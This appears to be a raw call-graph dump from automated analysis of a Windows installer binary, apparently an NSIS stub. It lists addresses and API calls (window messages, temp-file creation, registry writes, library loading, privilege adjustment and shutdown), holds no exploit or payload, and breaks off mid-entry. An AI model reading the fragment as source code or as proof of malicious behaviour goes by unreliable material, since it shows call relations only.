4054d6 4171->4176 4177 405309 GlobalFree 4172->4177 4172->4181 4173->4172 4174 40548a 4182 40549c ShowWindow GetDlgItem ShowWindow 4174->4182 4174->4195 4179 4052aa 4175->4179 4177->4181 4178 405109 GetWindowLongW SetWindowLongW 4183 405122 4178->4183 4190 4052bb SendMessageW 4179->4190 4180->4158 4180->4170 4181->4174 4197 40534b 4181->4197 4211 404e9e 4181->4211 4182->4195 4184 405127 ShowWindow 4183->4184 4185 40513f 4183->4185 4204 404498 SendMessageW 4184->4204 4205 404498 SendMessageW 4185->4205 4186->4178 4189 405081 SendMessageW 4186->4189 4191 405104 4186->4191 4192 4050d3 SendMessageW 4186->4192 4193 4050bf SendMessageW 4186->4193 4189->4186 4190->4160 4191->4178 4191->4183 4192->4186 4193->4186 4195->4171 4196 405455 4198 405460 InvalidateRect 4196->4198 4200 40546c 4196->4200 4199 405379 SendMessageW 4197->4199 4201 40538f 4197->4201 4198->4200 4199->4201 4200->4174 4220 404dd9 4200->4220 4201->4196 4202 405403 SendMessageW SendMessageW 4201->4202 4202->4201 4204->4195 4205->4161 4207 404e41 GetMessagePos ScreenToClient SendMessageW 4206->4207 4208 404e7d SendMessageW 4206->4208 4209 404e75 4207->4209 4210 404e7a 4207->4210 4208->4209 4209->4180 4210->4208 4223 406507 lstrcpynW 4211->4223 4213 404eb1 4224 40644e wsprintfW 4213->4224 4215 404ebb 4216 40140b 2 API calls 4215->4216 4217 404ec4 4216->4217 4225 406507 lstrcpynW 4217->4225 4219 404ecb 4219->4197 4226 404d10 4220->4226 4222 404dee 4222->4174 4223->4213 4224->4215 4225->4219 4227 404d29 4226->4227 4228 406544 17 API calls 4227->4228 4229 404d8d 4228->4229 4230 406544 17 API calls 4229->4230 4231 404d98 4230->4231 4232 406544 17 API calls 4231->4232 4233 404dae lstrlenW wsprintfW SetDlgItemTextW 4232->4233 4233->4222 4234 4045d3 lstrlenW 4235 4045f2 4234->4235 4236 4045f4 WideCharToMultiByte 4234->4236 4235->4236 4237 404954 4238 404980 4237->4238 4239 404991 4237->4239 4298 405b4b GetDlgItemTextW 4238->4298 4241 40499d GetDlgItem 4239->4241 4247 4049fc 4239->4247 4242 4049b1 4241->4242 4246 4049c5 SetWindowTextW 4242->4246 4250 405e81 4 API calls 4242->4250 4243 404ae0 4296 404c8f 4243->4296 4300 405b4b GetDlgItemTextW 4243->4300 4244 40498b 4245 40678e 5 API calls 4244->4245 4245->4239 4251 404463 18 API calls 4246->4251 4247->4243 4252 406544 17 API calls 4247->4252 4247->4296 4249 4044ca 8 API calls 4254 404ca3 4249->4254 4255 4049bb 4250->4255 4256 4049e1 4251->4256 4257 404a70 SHBrowseForFolderW 4252->4257 4253 404b10 4258 405ede 18 API calls 4253->4258 4255->4246 4262 405dd6 3 API calls 4255->4262 4259 404463 18 API calls 4256->4259 4257->4243 4260 404a88 CoTaskMemFree 4257->4260 4261 404b16 4258->4261 4263 4049ef 4259->4263 4264 405dd6 3 API calls 4260->4264 4301 406507 lstrcpynW 4261->4301 4262->4246 4299 404498 SendMessageW 4263->4299 4266 404a95 4264->4266 4269 404acc SetDlgItemTextW 4266->4269 4273 406544 17 API calls 4266->4273 4268 4049f5 4271 4068d4 5 API calls 4268->4271 4269->4243 4270 404b2d 4272 4068d4 5 API calls 4270->4272 4271->4247 4279 404b34 4272->4279 4274 404ab4 lstrcmpiW 4273->4274 4274->4269 4276 404ac5 lstrcatW 4274->4276 4275 404b75 4302 406507 lstrcpynW 4275->4302 4276->4269 4278 404b7c 4280 405e81 4 API calls 4278->4280 4279->4275 4284 405e22 2 API calls 4279->4284 4285 404bcd 4279->4285 4281 404b82 GetDiskFreeSpaceW 4280->4281 4283 404ba6 MulDiv 4281->4283 4281->4285 4283->4285 4284->4279 4287 404dd9 20 API calls 4285->4287 4295 404c3e 4285->4295 4286 404c61 4303 404485 KiUserCallbackDispatcher 4286->4303 4289 404c2b 4287->4289 4288 40140b 2 API calls 4288->4286 4291 404c40 SetDlgItemTextW 4289->4291 4292 404c30 4289->4292 4291->4295 4293 404d10 20 API calls 4292->4293 4293->4295 4294 404c7d 4294->4296 4304 4048ad 4294->4304 4295->4286 4295->4288 4296->4249 4298->4244 4299->4268 4300->4253 4301->4270 4302->4278 4303->4294 4305 4048c0 SendMessageW 4304->4305 4306 4048bb 4304->4306 4305->4296 4306->4305 4307 401956 4308 402da6 17 API calls 4307->4308 4309 40195d lstrlenW 4308->4309 4310 402638 4309->4310 4311 4014d7 4312 402d84 17 API calls 4311->4312 4313 4014dd Sleep 4312->4313 4315 402c2a 4313->4315 3988 4020d8 3989 40219c 3988->3989 3990 4020ea 3988->3990 3992 401423 24 API calls 3989->3992 3991 402da6 17 API calls 3990->3991 3993 4020f1 3991->3993 3999 4022f6 3992->3999 3994 402da6 17 API calls 3993->3994 3995 4020fa 3994->3995 3996 402110 LoadLibraryExW 3995->3996 3997 402102 GetModuleHandleW 3995->3997 3996->3989 3998 402121 3996->3998 3997->3996 3997->3998 4008 406943 3998->4008 4002 402132 4005 401423 24 API calls 4002->4005 4006 402142 4002->4006 4003 40216b 4004 405569 24 API calls 4003->4004 4004->4006 4005->4006 4006->3999 4007 40218e FreeLibrary 4006->4007 4007->3999 4013 406529 WideCharToMultiByte 4008->4013 4010 406960 4011 406967 GetProcAddress 4010->4011 4012 40212c 4010->4012 4011->4012 4012->4002 4012->4003 4013->4010 4316 402b59 4317 402b60 4316->4317 4318 402bab 4316->4318 4321 402d84 17 API calls 4317->4321 4324 402ba9 4317->4324 4319 4068d4 5 API calls 4318->4319 4320 402bb2 4319->4320 4322 402da6 17 API calls 4320->4322 4323 402b6e 4321->4323 4325 402bbb 4322->4325 4326 402d84 17 API calls 4323->4326 4325->4324 4327 402bbf IIDFromString 4325->4327 4329 402b7a 4326->4329 4327->4324 4328 402bce 4327->4328 4328->4324 4334 406507 lstrcpynW 4328->4334 4333 40644e wsprintfW 4329->4333 4331 402beb CoTaskMemFree 4331->4324 4333->4324 4334->4331 4335 402a5b 4336 402d84 17 API calls 4335->4336 4337 402a61 4336->4337 4338 402aa4 4337->4338 4339 402a88 4337->4339 4347 40292e 4337->4347 4341 402abe 4338->4341 4342 402aae 4338->4342 4340 402a8d 4339->4340 4343 402a9e 4339->4343 4349 406507 lstrcpynW 4340->4349 4345 406544 17 API calls 4341->4345 4344 402d84 17 API calls 4342->4344 4343->4347 4350 40644e wsprintfW 4343->4350 4344->4343 4345->4343 4349->4347 4350->4347 4037 40175c 4038 402da6 17 API calls 4037->4038 4039 401763 4038->4039 4040 406026 2 API calls 4039->4040 4041 40176a 4040->4041 4042 406026 2 API calls 4041->4042 4042->4041 4351 401d5d 4352 402d84 17 API calls 4351->4352 4353 401d6e SetWindowLongW 4352->4353 4354 402c2a 4353->4354 4355 4054dd 4356 405501 4355->4356 4357 4054ed 4355->4357 4360 405509 IsWindowVisible 4356->4360 4366 405520 4356->4366 4358 4054f3 4357->4358 4359 40554a 4357->4359 4361 4044af SendMessageW 4358->4361 4363 40554f CallWindowProcW 4359->4363 4360->4359 4362 405516 4360->4362 4364 4054fd 4361->4364 4365 404e1e 5 API calls 4362->4365 4363->4364 4365->4366 4366->4363 4367 404e9e 4 API calls 4366->4367 4367->4359 4043 401ede 4044 402d84 17 API calls 4043->4044 4045 401ee4 4044->4045 4046 402d84 17 API calls 4045->4046 4047 401ef0 4046->4047 4048 401f07 EnableWindow 4047->4048 4049 401efc ShowWindow 4047->4049 4050 402c2a 4048->4050 4049->4050 4368 4028de 4369 4028e6 4368->4369 4370 4028ea FindNextFileW 4369->4370 4372 4028fc 4369->4372 4371 402943 4370->4371 4370->4372 4374 406507 lstrcpynW 4371->4374 4374->4372 4382 401563 4383 402ba4 4382->4383 4386 40644e wsprintfW 4383->4386 4385 402ba9 4386->4385 3447 403f64 3448 403f7c 3447->3448 3449 4040dd 3447->3449 3448->3449 3452 403f88 3448->3452 3450 40412e 3449->3450 3451 4040ee GetDlgItem GetDlgItem 3449->3451 3454 404188 3450->3454 3466 401389 2 API calls 3450->3466 3453 404463 18 API calls 3451->3453 3455 403f93 SetWindowPos 3452->3455 3456 403fa6 3452->3456 3457 404118 SetClassLongW 3453->3457 3467 4040d8 3454->3467 3520 4044af 3454->3520 3455->3456 3459 403ff1 3456->3459 3460 403faf ShowWindow 3456->3460 3463 40140b 2 API calls 3457->3463 3464 404010 3459->3464 3465 403ff9 DestroyWindow 3459->3465 3461 4040ca 3460->3461 3462 403fcf GetWindowLongW 3460->3462 3542 4044ca 3461->3542 3462->3461 3468 403fe8 ShowWindow 3462->3468 3463->3450 3470 404015 SetWindowLongW 3464->3470 3471 404026 3464->3471 3469 4043ec 3465->3469 3472 404160 3466->3472 3468->3459 3469->3467 3478 40441d ShowWindow 3469->3478 3470->3467 3471->3461 3476 404032 GetDlgItem 3471->3476 3472->3454 3477 404164 SendMessageW 3472->3477 3474 40140b 2 API calls 3489 40419a 3474->3489 3475 4043ee DestroyWindow EndDialog 3475->3469 3479 404060 3476->3479 3480 404043 SendMessageW IsWindowEnabled 3476->3480 3477->3467 3478->3467 3482 40406d 3479->3482 3484 4040b4 SendMessageW 3479->3484 3485 404080 3479->3485 3493 404065 3479->3493 3480->3467 3480->3479 3481 406544 17 API calls 3481->3489 3482->3484 3482->3493 3484->3461 3486 404088 3485->3486 3487 40409d 3485->3487 3536 40140b 3486->3536 3491 40140b 2 API calls 3487->3491 3488 40409b 3488->3461 3489->3467 3489->3474 3489->3475 3489->3481 3492 404463 18 API calls 3489->3492 3511 40432e DestroyWindow 3489->3511 3523 404463 3489->3523 3494 4040a4 3491->3494 3492->3489 3539 40443c 3493->3539 3494->3461 3494->3493 3496 404215 GetDlgItem 3497 404232 ShowWindow KiUserCallbackDispatcher 3496->3497 3498 40422a 3496->3498 3526 404485 KiUserCallbackDispatcher 3497->3526 3498->3497 3500 40425c EnableWindow 3505 404270 3500->3505 3501 404275 GetSystemMenu EnableMenuItem SendMessageW 3502 4042a5 SendMessageW 3501->3502 3501->3505 3502->3505 3505->3501 3527 404498 SendMessageW 3505->3527 3528 403f45 3505->3528 3531 406507 lstrcpynW 3505->3531 3507 4042d4 lstrlenW 3508 406544 17 API calls 3507->3508 3509 4042ea SetWindowTextW 3508->3509 3532 401389 3509->3532 3511->3469 3512 404348 CreateDialogParamW 3511->3512 3512->3469 3513 40437b 3512->3513 3514 404463 18 API calls 3513->3514 3515 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3514->3515 3516 401389 2 API calls 3515->3516 3517 4043cc 3516->3517 3517->3467 3518 4043d4 ShowWindow 3517->3518 3519 4044af SendMessageW 3518->3519 3519->3469 3521 4044c7 3520->3521 3522 4044b8 SendMessageW 3520->3522 3521->3489 3522->3521 3524 406544 17 API calls 3523->3524 3525 40446e SetDlgItemTextW 3524->3525 3525->3496 3526->3500 3527->3505 3529 406544 17 API calls 3528->3529 3530 403f53 SetWindowTextW 3529->3530 3530->3505 3531->3507 3534 401390 3532->3534 3533 4013fe 3533->3489 3534->3533 3535 4013cb MulDiv SendMessageW 3534->3535 3535->3534 3537 401389 2 API calls 3536->3537 3538 401420 3537->3538 3538->3493 3540 404443 3539->3540 3541 404449 SendMessageW 3539->3541 3540->3541 3541->3488 3543 4044e2 GetWindowLongW 3542->3543 3544 40458d 3542->3544 3543->3544 3545 4044f7 3543->3545 3544->3467 3545->3544 3546 404524 GetSysColor 3545->3546 3547 404527 3545->3547 3546->3547 3548 404537 SetBkMode 3547->3548 3549 40452d SetTextColor 3547->3549 3550 404555 3548->3550 3551 40454f GetSysColor 3548->3551 3549->3548 3552 404566 3550->3552 3553 40455c SetBkColor 3550->3553 3551->3550 3552->3544 3554 404580 CreateBrushIndirect 3552->3554 3555 404579 DeleteObject 3552->3555 3553->3552 3554->3544 3555->3554 4387 401968 4388 402d84 17 API calls 4387->4388 4389 40196f 4388->4389 4390 402d84 17 API calls 4389->4390 4391 40197c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 401993 lstrlenW 4392->4393 4394 4019a4 4393->4394 4395 4019e5 4394->4395 4399 406507 lstrcpynW 4394->4399 4397 4019d5 4397->4395 4398 4019da lstrlenW 4397->4398 4398->4395 4399->4397 4400 40166a 4401 402da6 17 API calls 4400->4401 4402 401670 4401->4402 4403 40683d 2 API calls 4402->4403 4404 401676 4403->4404 4405 402aeb 4406 402d84 17 API calls 4405->4406 4407 402af1 4406->4407 4408 406544 17 API calls 4407->4408 4409 40292e 4407->4409 4408->4409 4410 4026ec 4411 402d84 17 API calls 4410->4411 4412 4026fb 4411->4412 4413 402745 ReadFile 4412->4413 4414 40607a ReadFile 4412->4414 4415 402785 MultiByteToWideChar 4412->4415 4416 40283a 4412->4416 4419 4027ab SetFilePointer MultiByteToWideChar 4412->4419 4420 40284b 4412->4420 4422 402838 4412->4422 4423 4060d8 SetFilePointer 4412->4423 4413->4412 4413->4422 4414->4412 4415->4412 4432 40644e wsprintfW 4416->4432 4419->4412 4421 40286c SetFilePointer 4420->4421 4420->4422 4421->4422 4424 4060f4 4423->4424 4425 40610c 4423->4425 4426 40607a ReadFile 4424->4426 4425->4412 4427 406100 4426->4427 4427->4425 4428 406115 SetFilePointer 4427->4428 4429 40613d SetFilePointer 4427->4429 4428->4429 4430 406120 4428->4430 4429->4425 4431 4060a9 WriteFile 4430->4431 4431->4425 4432->4422 3699 40176f 3700 402da6 17 API calls 3699->3700 3701 401776 3700->3701 3702 401796 3701->3702 3703 40179e 3701->3703 3738 406507 lstrcpynW 3702->3738 3739 406507 lstrcpynW 3703->3739 3706 40179c 3710 40678e 5 API calls 3706->3710 3707 4017a9 3708 405dd6 3 API calls 3707->3708 3709 4017af lstrcatW 3708->3709 3709->3706 3714 4017bb 3710->3714 3711 40683d 2 API calls 3711->3714 3712 405fd2 2 API calls 3712->3714 3714->3711 3714->3712 3715 4017cd CompareFileTime 3714->3715 3716 40188d 3714->3716 3722 406507 lstrcpynW 3714->3722 3725 406544 17 API calls 3714->3725 3734 401864 3714->3734 3737 405ff7 GetFileAttributesW CreateFileW 3714->3737 3740 405b67 3714->3740 3715->3714 3717 405569 24 API calls 3716->3717 3719 401897 3717->3719 3718 405569 24 API calls 3736 401879 3718->3736 3720 4032b4 35 API calls 3719->3720 3721 4018aa 3720->3721 3723 4018be SetFileTime 3721->3723 3724 4018d0 CloseHandle 3721->3724 3722->3714 3723->3724 3726 4018e1 3724->3726 3724->3736 3725->3714 3727 4018e6 3726->3727 3728 4018f9 3726->3728 3729 406544 17 API calls 3727->3729 3730 406544 17 API calls 3728->3730 3732 4018ee lstrcatW 3729->3732 3733 401901 3730->3733 3732->3733 3735 405b67 MessageBoxIndirectW 3733->3735 3734->3718 3734->3736 3735->3736 3737->3714 3738->3706 3739->3707 3741 405b7c 3740->3741 3742 405bc8 3741->3742 3743 405b90 MessageBoxIndirectW 3741->3743 3742->3714 3743->3742 4440 401a72 4441 402d84 17 API calls 4440->4441 4442 401a7b 4441->4442 4443 402d84 17 API calls 4442->4443 4444 401a20 4443->4444 4445 401573 4446 401583 ShowWindow 4445->4446 4447 40158c 4445->4447 4446->4447 4448 40159a ShowWindow 4447->4448 4449 402c2a 4447->4449 4448->4449 4450 403b74 4451 403b7f 4450->4451 4452 403b86 GlobalAlloc 4451->4452 4453 403b83 4451->4453 4452->4453 4454 4023f4 4455 402da6 17 API calls 4454->4455 4456 402403 4455->4456 4457 402da6 17 API calls 4456->4457 4458 40240c 4457->4458 4459 402da6 17 API calls 4458->4459 4460 402416 GetPrivateProfileStringW 4459->4460 4461 4014f5 SetForegroundWindow 4462 402c2a 4461->4462 4463 401ff6 4464 402da6 17 API calls 4463->4464 4465 401ffd 4464->4465 4466 40683d 2 API calls 4465->4466 4467 402003 4466->4467 4469 402014 4467->4469 4470 40644e wsprintfW 4467->4470 4470->4469 3754 4034f7 SetErrorMode GetVersionExW 3755 403581 3754->3755 3756 403549 GetVersionExW 3754->3756 3757 4035da 3755->3757 3758 4068d4 5 API calls 3755->3758 3756->3755 3759 406864 3 API calls 3757->3759 3758->3757 3760 4035f0 lstrlenA 3759->3760 3760->3757 3761 403600 3760->3761 3762 4068d4 5 API calls 3761->3762 3763 403607 3762->3763 3764 4068d4 5 API calls 3763->3764 3765 40360e 3764->3765 3766 4068d4 5 API calls 3765->3766 3767 40361a #17 OleInitialize SHGetFileInfoW 3766->3767 3845 406507 lstrcpynW 3767->3845 3770 403667 GetCommandLineW 3846 406507 lstrcpynW 3770->3846 3772 403679 3773 405e03 CharNextW 3772->3773 3774 40369f CharNextW 3773->3774 3780 4036b0 3774->3780 3775 4037ae 3776 4037c2 GetTempPathW 3775->3776 3847 4034c6 3776->3847 3778 4037da 3781 403834 DeleteFileW 3778->3781 3782 4037de GetWindowsDirectoryW lstrcatW 3778->3782 3779 405e03 CharNextW 3779->3780 3780->3775 3780->3779 3787 4037b0 3780->3787 3857 40307d GetTickCount GetModuleFileNameW 3781->3857 3784 4034c6 12 API calls 3782->3784 3785 4037fa 3784->3785 3785->3781 3786 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3785->3786 3790 4034c6 12 API calls 3786->3790 3941 406507 lstrcpynW 3787->3941 3788 403847 3789 40390b 3788->3789 3791 4038fc 3788->3791 3795 405e03 CharNextW 3788->3795 3946 403adc 3789->3946 3794 40382c 3790->3794 3885 403bb6 3791->3885 3794->3781 3794->3789 3812 403869 3795->3812 3798 403a33 3800 405b67 MessageBoxIndirectW 3798->3800 3799 403a48 3801 403a50 GetCurrentProcess OpenProcessToken 3799->3801 3802 403ac6 ExitProcess 3799->3802 3806 403a40 ExitProcess 3800->3806 3807 403a96 3801->3807 3808 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 3801->3808 3804 4038d2 3809 405ede 18 API calls 3804->3809 3805 403913 3811 405ad2 5 API calls 3805->3811 3810 4068d4 5 API calls 3807->3810 3808->3807 3813 4038de 3809->3813 3814 403a9d 3810->3814 3815 403918 lstrcatW 3811->3815 3812->3804 3812->3805 3813->3789 3942 406507 lstrcpynW 3813->3942 3816 403ab2 ExitWindowsEx 3814->3816 3821 403abf 3814->3821 3817 403934 lstrcatW lstrcmpiW 3815->3817 3818 403929 lstrcatW 3815->3818 3816->3802 3816->3821 3817->3789 3819 403954 3817->3819 3818->3817 3822 403960 3819->3822 3823 403959 3819->3823 3825 40140b 2 API calls 3821->3825 3827 405ab5 2 API calls 3822->3827 3826 405a38 4 API calls 3823->3826 3824 4038f1 3943 406507 lstrcpynW 3824->3943 3825->3802 3829 40395e 3826->3829 3830 403965 SetCurrentDirectoryW 3827->3830 3829->3830 3831 403982 3830->3831 3832 403977 3830->3832 3945 406507 lstrcpynW 3831->3945 3944 406507 lstrcpynW 3832->3944 3835 406544 17 API calls 3836 4039c4 DeleteFileW 3835->3836 3837 4039d0 CopyFileW 3836->3837 3842 40398f 3836->3842 3837->3842 3838 403a1a 3840 4062c7 36 API calls 3838->3840 3839 4062c7 36 API calls 3839->3842 3840->3789 3841 406544 17 API calls 3841->3842 3842->3835 3842->3838 3842->3839 3842->3841 3843 405aea 2 API calls 3842->3843 3844 403a04 CloseHandle 3842->3844 3843->3842 3844->3842 3845->3770 3846->3772 3848 40678e 5 API calls 3847->3848 3849 4034d2 3848->3849 3850 4034dc 3849->3850 3851 405dd6 3 API calls 3849->3851 3850->3778 3852 4034e4 3851->3852 3853 405ab5 2 API calls 3852->3853 3854 4034ea 3853->3854 3953 406026 3854->3953 3957 405ff7 GetFileAttributesW CreateFileW 3857->3957 3859 4030bd 3860 4030cd 3859->3860 3958 406507 lstrcpynW 3859->3958 3860->3788 3862 4030e3 3863 405e22 2 API calls 3862->3863 3864 4030e9 3863->3864 3959 406507 lstrcpynW 3864->3959 3866 4030f4 GetFileSize 3881 4031ee 3866->3881 3884 40310b 3866->3884 3868 4031f7 3868->3860 3870 403227 GlobalAlloc 3868->3870 3972 4034af SetFilePointer 3868->3972 3869 403499 ReadFile 3869->3884 3971 4034af SetFilePointer 3870->3971 3872 40325a 3874 403019 6 API calls 3872->3874 3874->3860 3875 403210 3877 403499 ReadFile 3875->3877 3876 403242 3878 4032b4 35 API calls 3876->3878 3879 40321b 3877->3879 3882 40324e 3878->3882 3879->3860 3879->3870 3880 403019 6 API calls 3880->3884 3960 403019 3881->3960 3882->3860 3882->3882 3883 40328b SetFilePointer 3882->3883 3883->3860 3884->3860 3884->3869 3884->3872 3884->3880 3884->3881 3886 4068d4 5 API calls 3885->3886 3887 403bca 3886->3887 3888 403bd0 3887->3888 3889 403be2 3887->3889 3981 40644e wsprintfW 3888->3981 3890 4063d5 3 API calls 3889->3890 3891 403c12 3890->3891 3893 403c31 lstrcatW 3891->3893 3895 4063d5 3 API calls 3891->3895 3894 403be0 3893->3894 3973 403e8c 3894->3973 3895->3893 3898 405ede 18 API calls 3899 403c63 3898->3899 3900 403cf7 3899->3900 3902 4063d5 3 API calls 3899->3902 3901 405ede 18 API calls 3900->3901 3903 403cfd 3901->3903 3904 403c95 3902->3904 3905 403d0d LoadImageW 3903->3905 3906 406544 17 API calls 3903->3906 3904->3900 3909 403cb6 lstrlenW 3904->3909 3913 405e03 CharNextW 3904->3913 3907 403db3 3905->3907 3908 403d34 RegisterClassW 3905->3908 3906->3905 3912 40140b 2 API calls 3907->3912 3910 403dbd 3908->3910 3911 403d6a SystemParametersInfoW CreateWindowExW 3908->3911 3914 403cc4 lstrcmpiW 3909->3914 3915 403cea 3909->3915 3910->3789 3911->3907 3916 403db9 3912->3916 3917 403cb3 3913->3917 3914->3915 3918 403cd4 GetFileAttributesW 3914->3918 3919 405dd6 3 API calls 3915->3919 3916->3910 3922 403e8c 18 API calls 3916->3922 3917->3909 3921 403ce0 3918->3921 3920 403cf0 3919->3920 3982 406507 lstrcpynW 3920->3982 3921->3915 3925 405e22 2 API calls 3921->3925 3923 403dca 3922->3923 3926 403dd6 ShowWindow 3923->3926 3927 403e59 3923->3927 3925->3915 3928 406864 3 API calls 3926->3928 3929 40563c 5 API calls 3927->3929 3930 403dee 3928->3930 3931 403e5f 3929->3931 3934 403dfc GetClassInfoW 3930->3934 3936 406864 3 API calls 3930->3936 3932 403e63 3931->3932 3933 403e7b 3931->3933 3932->3910 3939 40140b 2 API calls 3932->3939 3935 40140b 2 API calls 3933->3935 3937 403e10 GetClassInfoW RegisterClassW 3934->3937 3938 403e26 DialogBoxParamW 3934->3938 3935->3910 3936->3934 3937->3938 3940 40140b 2 API calls 3938->3940 3939->3910 3940->3910 3941->3776 3942->3824 3943->3791 3944->3831 3945->3842 3947 403af4 3946->3947 3948 403ae6 CloseHandle 3946->3948 3984 403b21 3947->3984 3948->3947 3951 405c13 67 API calls 3952 403a28 OleUninitialize 3951->3952 3952->3798 3952->3799 3954 406033 GetTickCount GetTempFileNameW 3953->3954 3955 4034f5 3954->3955 3956 406069 3954->3956 3955->3778 3956->3954 3956->3955 3957->3859 3958->3862 3959->3866 3961 403022 3960->3961 3962 40303a 3960->3962 3963 403032 3961->3963 3964 40302b DestroyWindow 3961->3964 3965 403042 3962->3965 3966 40304a GetTickCount 3962->3966 3963->3868 3964->3963 3967 406910 2 API calls 3965->3967 3968 403058 CreateDialogParamW ShowWindow 3966->3968 3969 40307b 3966->3969 3970 403048 3967->3970 3968->3969 3969->3868 3970->3868 3971->3876 3972->3875 3974 403ea0 3973->3974 3983 40644e wsprintfW 3974->3983 3976 403f11 3977 403f45 18 API calls 3976->3977 3979 403f16 3977->3979 3978 403c41 3978->3898 3979->3978 3980 406544 17 API calls 3979->3980 3980->3979 3981->3894 3982->3900 3983->3976 3985 403b2f 3984->3985 3986 403af9 3985->3986 3987 403b34 FreeLibrary GlobalFree 3985->3987 3986->3951 3987->3986 3987->3987 4471 401b77 4472 402da6 17 API calls 4471->4472 4473 401b7e 4472->4473 4474 402d84 17 API calls 4473->4474 4475 401b87 wsprintfW 4474->4475 4476 402c2a 4475->4476 4477 40167b 4478 402da6 17 API calls 4477->4478 4479 401682 4478->4479 4480 402da6 17 API calls 4479->4480 4481 40168b 4480->4481 4482 402da6 17 API calls 4481->4482 4483 401694 MoveFileW 4482->4483 4484 4016a7 4483->4484 4490 4016a0 4483->4490 4485 4022f6 4484->4485 4486 40683d 2 API calls 4484->4486 4488 4016b6 4486->4488 4487 401423 24 API calls 4487->4485 4488->4485 4489 4062c7 36 API calls 4488->4489 4489->4490 4490->4487 4491 406bfe 4492 406a82 4491->4492 4493 4073ed 4492->4493 4494 406b03 GlobalFree 4492->4494 4495 406b0c GlobalAlloc 4492->4495 4496 406b83 GlobalAlloc 4492->4496 4497 406b7a GlobalFree 4492->4497 4494->4495 4495->4492 4495->4493 4496->4492 4496->4493 4497->4496 4498 4019ff 4499 402da6 17 API calls 4498->4499 4500 401a06 4499->4500 4501 402da6 17 API calls 4500->4501 4502 401a0f 4501->4502 4503 401a16 lstrcmpiW 4502->4503 4504 401a28 lstrcmpW 4502->4504 4505 401a1c 4503->4505 4504->4505 4506 4022ff 4507 402da6 17 API calls 4506->4507 4508 402305 4507->4508 4509 402da6 17 API calls 4508->4509 4510 40230e 4509->4510 4511 402da6 17 API calls 4510->4511 4512 402317 4511->4512 4513 40683d 2 API calls 4512->4513 4514 402320 4513->4514 4515 402331 lstrlenW lstrlenW 4514->4515 4516 402324 4514->4516 4518 405569 24 API calls 4515->4518 4517 405569 24 API calls 4516->4517 4519 40232c 4516->4519 4517->4519 4520 40236f SHFileOperationW 4518->4520 4520->4516 4520->4519 4521 401000 4522 401037 BeginPaint GetClientRect 4521->4522 4523 40100c DefWindowProcW 4521->4523 4525 4010f3 4522->4525 4526 401179 4523->4526 4527 401073 CreateBrushIndirect FillRect DeleteObject 4525->4527 4528 4010fc 4525->4528 4527->4525 4529 401102 CreateFontIndirectW 4528->4529 4530 401167 EndPaint 4528->4530 4529->4530 4531 401112 6 API calls 4529->4531 4530->4526 4531->4530 4532 401d81 4533 401d94 GetDlgItem 4532->4533 4534 401d87 4532->4534 4536 401d8e 4533->4536 4535 402d84 17 API calls 4534->4535 4535->4536 4537 401dd5 GetClientRect LoadImageW SendMessageW 4536->4537 4538 402da6 17 API calls 4536->4538 4540 401e33 4537->4540 4542 401e3f 4537->4542 4538->4537 4541 401e38 DeleteObject 4540->4541 4540->4542 4541->4542 4543 401503 4544 40150b 4543->4544 4546 40151e 4543->4546 4545 402d84 17 API calls 4544->4545 4545->4546 4547 402383 4548 40238a 4547->4548 4551 40239d 4547->4551 4549 406544 17 API calls 4548->4549 4550 402397 4549->4550 4552 405b67 MessageBoxIndirectW 4550->4552 4552->4551 4553 402c05 SendMessageW 4554 402c2a 4553->4554 4555 402c1f InvalidateRect 4553->4555 4555->4554 3639 40248a 3640 402da6 17 API calls 3639->3640 3641 40249c 3640->3641 3642 402da6 17 API calls 3641->3642 3643 4024a6 3642->3643 3656 402e36 3643->3656 3646 40292e 3647 4024de 3649 4024ea 3647->3649 3681 402d84 3647->3681 3648 402da6 17 API calls 3651 4024d4 lstrlenW 3648->3651 3650 402509 RegSetValueExW 3649->3650 3660 4032b4 3649->3660 3654 40251f RegCloseKey 3650->3654 3651->3647 3654->3646 3657 402e51 3656->3657 3684 4063a2 3657->3684 3661 4032cd 3660->3661 3662 4032f8 3661->3662 3698 4034af SetFilePointer 3661->3698 3688 403499 3662->3688 3666 403423 3666->3650 3667 403315 GetTickCount 3677 403328 3667->3677 3668 403439 3669 40343d 3668->3669 3673 403455 3668->3673 3670 403499 ReadFile 3669->3670 3670->3666 3671 403499 ReadFile 3671->3673 3672 403499 ReadFile 3672->3677 3673->3666 3673->3671 3674 4060a9 WriteFile 3673->3674 3674->3673 3676 40338e GetTickCount 3676->3677 3677->3666 3677->3672 3677->3676 3678 4033b7 MulDiv wsprintfW 3677->3678 3680 4060a9 WriteFile 3677->3680 3691 406a4f 3677->3691 3679 405569 24 API calls 3678->3679 3679->3677 3680->3677 3682 406544 17 API calls 3681->3682 3683 402d99 3682->3683 3683->3649 3685 4063b1 3684->3685 3686 4024b6 3685->3686 3687 4063bc RegCreateKeyExW 3685->3687 3686->3646 3686->3647 3686->3648 3687->3686 3689 40607a ReadFile 3688->3689 3690 403303 3689->3690 3690->3666 3690->3667 3690->3668 3692 406a74 3691->3692 3695 406a7c 3691->3695 3692->3677 3693 406b03 GlobalFree 3694 406b0c GlobalAlloc 3693->3694 3694->3692 3694->3695 3695->3692 3695->3693 3695->3694 3696 406b83 GlobalAlloc 3695->3696 3697 406b7a GlobalFree 3695->3697 3696->3692 3696->3695 3697->3696 3698->3662 4563 40290b 4564 402da6 17 API calls 4563->4564 4565 402912 FindFirstFileW 4564->4565 4566 40293a 4565->4566 4569 402925 4565->4569 4571 40644e wsprintfW 4566->4571 4568 402943 4572 406507 lstrcpynW 4568->4572 4571->4568 4572->4569 4573 40190c 4574 401943 4573->4574 4575 402da6 17 API calls 4574->4575 4576 401948 4575->4576 4577 405c13 67 API calls 4576->4577 4578 401951 4577->4578 4579 40490d 4580 404943 4579->4580 4581 40491d 4579->4581 4583 4044ca 8 API calls 4580->4583 4582 404463 18 API calls 4581->4582 4584 40492a SetDlgItemTextW 4582->4584 4585 40494f 4583->4585 4584->4580 4586 40190f 4587 402da6 17 API calls 4586->4587 4588 401916 4587->4588 4589 405b67 MessageBoxIndirectW 4588->4589 4590 40191f 4589->4590 4591 401491 4592 405569 24 API calls 4591->4592 4593 401498 4592->4593 4594 402891 4595 402898 4594->4595 4597 402ba9 4594->4597 4596 402d84 17 API calls 4595->4596 4598 40289f 4596->4598 4599 4028ae SetFilePointer 4598->4599 4599->4597 4600 4028be 4599->4600 4602 40644e wsprintfW 4600->4602 4602->4597 4603 401f12 4604 402da6 17 API 